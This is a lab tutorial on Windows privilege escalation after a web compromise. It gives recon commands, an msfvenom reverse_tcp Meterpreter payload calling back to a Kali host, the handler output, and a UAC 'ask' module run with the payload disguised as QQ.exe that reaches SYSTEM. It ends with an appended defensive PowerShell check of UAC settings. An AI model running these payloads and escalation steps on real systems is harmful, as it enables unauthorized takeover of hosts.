Preface
After taking over a server through a web vulnerability, the privileges obtained are usually very low, so privilege escalation is normally required. This article focuses on Windows.
Privilege levels in Windows
There are three main ones:
- system
- administrator
- users
By default we land with user privileges.
Basic information gathering
At this stage you can first do a round of information gathering through AntSword's virtual terminal.
# Get the OS version
systeminfo | findstr OS
# Get the host name
hostname
# List the security privileges of the current user
whoami /priv
# Get the status of a user's sessions
query user <username>
# Check whether a given port is open (here RDP)
netstat -ano | findstr 3389
# Check which antivirus products are installed
dir c:\programdata
# Read the configured remote desktop port
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Setting up the environment
First, generate an exe payload with the Metasploit that ships with Kali. The target used here is Windows 10 with the firewall fully disabled.
win10: 10.211.55.4
kali: 10.211.55.5
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.5 LPORT=4444 -f exe -o shell.exe
Then set up the listener in Kali:
┌──(root💀web)-[~]
└─# msfconsole
=[ metasploit v6.0.56-dev ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.211.55.5
LHOST => 10.211.55.5
msf6 exploit(multi/handler) > EXPLOIT
[-] Unknown command: EXPLOIT
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.211.55.5:4444
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Meterpreter session 2 opened (10.211.55.5:4444 -> 10.211.55.4:51055) at 2021-08-18 15:31:59 +0800
[*] Meterpreter session 1 opened (10.211.55.5:4444 -> 10.211.55.4:51146) at 2021-08-18 15:31:59 +0800
Then copy the generated payload to the Windows 10 machine and run it, to simulate a host that was compromised through a web vulnerability.
Privilege escalation with getsystem
meterpreter > getsystem
Just type it directly; it does not succeed 100% of the time, and here it failed.
Privilege escalation with the ask module
msf6 exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
msf6 exploit(windows/local/ask) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ask) > set filename QQ.exe
filename => QQ.exe
msf6 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 10.211.55.5:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading QQ.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Meterpreter session 3 opened (10.211.55.5:4444 -> 10.211.55.4:51150) at 2021-08-18 15:39:03 +0800
At this point the session's privileges have been raised to administrator; running getsystem again now succeeds and returns SYSTEM.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
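The ask module above only succeeds because UAC shows the user a RunAs consent prompt that they click through, and its description targets lowered UAC settings. As an added defender-side check, not part of the original post, this PowerShell snippet reads the three UAC policy values from the registry and reports which ones weaken that prompt; the registry path and value names are the standard Windows ones, and the finding text is my own.

```powershell
# Added example, not from the original post: audit the UAC policy values that
# decide how (or whether) the consent prompt used by exploit/windows/local/ask is
# shown. Assumes a PowerShell session on the Windows host with read access to HKLM.
function Test-UacPolicy {
    param(
        [int]$EnableLUA,
        [int]$ConsentPromptBehaviorAdmin,
        [int]$PromptOnSecureDesktop
    )
    # Documented meanings of ConsentPromptBehaviorAdmin.
    $behavior = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (Windows default)'
    }
    $findings = @()
    if ($EnableLUA -ne 1) {
        $findings += 'EnableLUA is not 1: UAC is off, so an admin user already runs with a full token and no prompt is ever shown.'
    }
    if ($ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin is 0: elevation requests from admin users are approved silently.'
    }
    if ($PromptOnSecureDesktop -ne 1) {
        $findings += 'PromptOnSecureDesktop is not 1: the consent dialog is not isolated from other user-mode processes.'
    }
    [pscustomobject]@{
        EnableLUA     = $EnableLUA
        AdminPrompt   = "$ConsentPromptBehaviorAdmin - $($behavior[$ConsentPromptBehaviorAdmin])"
        SecureDesktop = $PromptOnSecureDesktop
        Findings      = $findings
    }
}

# Read the live values; a value that is missing from the key is treated as 0.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$p = Get-ItemProperty -Path $key
$result = Test-UacPolicy -EnableLUA ([int]$p.EnableLUA) `
    -ConsentPromptBehaviorAdmin ([int]$p.ConsentPromptBehaviorAdmin) `
    -PromptOnSecureDesktop ([int]$p.PromptOnSecureDesktop)
$result | Format-List
if ($result.Findings.Count -eq 0) {
    'No weak UAC setting found: a prompt-based escalation still needs an admin user to accept a secure-desktop dialog.'
}
```

On a default Windows 10 install the script reports 1 / 5 / 1 with no findings, which is exactly the state in which the ask module still depends on the logged-in administrator clicking "Yes".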